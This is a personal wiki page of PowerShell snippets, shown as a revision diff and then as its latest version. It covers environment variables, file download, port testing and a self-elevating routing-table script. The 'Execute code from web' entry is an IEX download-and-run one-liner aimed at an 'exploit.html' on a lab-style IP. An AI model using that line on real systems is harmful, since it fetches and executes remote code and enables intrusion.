Difference between revisions of "PowerShell"

From RHS Wiki
Jump to navigation Jump to search
(Created page with "== Modify Routing Table == <source lang="PowerShell">param([switch]$Elevated) function Check-Admin { $currentUser = New-Object Security.Principal.WindowsPrincipal $([Security...")
 
m
Tag: visualeditor
 
(6 intermediate revisions by the same user not shown)
Line 1: Line 1:
== Modify Routing Table ==
+
==Set environment variable==
<source lang="PowerShell">param([switch]$Elevated)
+
<syntaxhighlight lang="powershell">
 +
$env:DEBUG=$true
 +
</syntaxhighlight>
 +
 
 +
== Download file ==
 +
<syntaxhighlight lang="dos">
 +
powershell "(new-object System.Net.WebClient).Downloadfile('http://<IP>/writeup.exe', 'writeup.exe')"
 +
</syntaxhighlight>
 +
 
 +
==Execute code from web==
 +
<syntaxhighlight lang="powershell">
 +
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.8:8000/exploit.html')"
 +
</syntaxhighlight>
 +
 
 +
== Networking ==
 +
 
 +
=== Test Port open ===
 +
<syntaxhighlight lang="powershell">
 +
Test-NetConnection -ComputerName webproxy.global.basf.net -Port 8080
 +
</syntaxhighlight>
 +
 
 +
===Modify Routing Table===
 +
<source lang="PowerShell">param([switch]$Elevated)
 
function Check-Admin {
 
function Check-Admin {
$currentUser = New-Object Security.Principal.WindowsPrincipal $([Security.Principal.WindowsIdentity]::GetCurrent())
+
    $currentUser = New-Object Security.Principal.WindowsPrincipal $([Security.Principal.WindowsIdentity]::GetCurrent())
$currentUser.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
+
    $currentUser.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
 
}
 
}
 
if ((Check-Admin) -eq $false)  {
 
if ((Check-Admin) -eq $false)  {
if ($elevated)
+
    if ($elevated)
{
+
    {
# could not elevate, quit
+
        # could not elevate, quit
}
+
    }
 
   
 
   
 
else {
 
else {
+
        Start-Process powershell.exe -Verb RunAs -ArgumentList ('-noprofile -noexit -file "{0}" -elevated' -f ($myinvocation.MyCommand.Definition))
Start-Process powershell.exe -Verb RunAs -ArgumentList ('-noprofile -noexit -file "{0}" -elevated' -f ($myinvocation.MyCommand.Definition))
+
    }
}
+
    exit
exit
 
 
}
 
}
  
 
#eliminar ruta por defecto al haber 2 y a;ade ruta a vsphere
 
#eliminar ruta por defecto al haber 2 y a;ade ruta a vsphere
 
 
route delete 0.0.0.0 mask 0.0.0.0 15.17.160.1
 
route delete 0.0.0.0 mask 0.0.0.0 15.17.160.1
 
 
route add 20.1.40.0 mask 255.255.255.0 15.17.160.1
 
route add 20.1.40.0 mask 255.255.255.0 15.17.160.1
 
 
Start-Sleep -s 2
 
Start-Sleep -s 2
 
 
exit</source>
 
exit</source>

Latest revision as of 07:55, 21 April 2022

Set environment variable[edit]

$env:DEBUG=$true

Download file[edit]

powershell "(new-object System.Net.WebClient).Downloadfile('http://<IP>/writeup.exe', 'writeup.exe')"

Execute code from web[edit]

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.8:8000/exploit.html')"

Networking[edit]

Test Port open[edit]

Test-NetConnection -ComputerName webproxy.global.basf.net -Port 8080

Modify Routing Table[edit]

param([switch]$Elevated)
function Check-Admin {
    $currentUser = New-Object Security.Principal.WindowsPrincipal $([Security.Principal.WindowsIdentity]::GetCurrent())
    $currentUser.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
}
if ((Check-Admin) -eq $false)  {
    if ($elevated)
    {
        # could not elevate, quit
    }
 
else {
        Start-Process powershell.exe -Verb RunAs -ArgumentList ('-noprofile -noexit -file "{0}" -elevated' -f ($myinvocation.MyCommand.Definition))
    }
    exit
}

#eliminar ruta por defecto al haber 2 y a;ade ruta a vsphere
route delete 0.0.0.0 mask 0.0.0.0 15.17.160.1
route add 20.1.40.0 mask 255.255.255.0 15.17.160.1
Start-Sleep -s 2
exit
Retrieved from "https://wiki.herrerosolis.com/index.php?title=PowerShell&oldid=2275"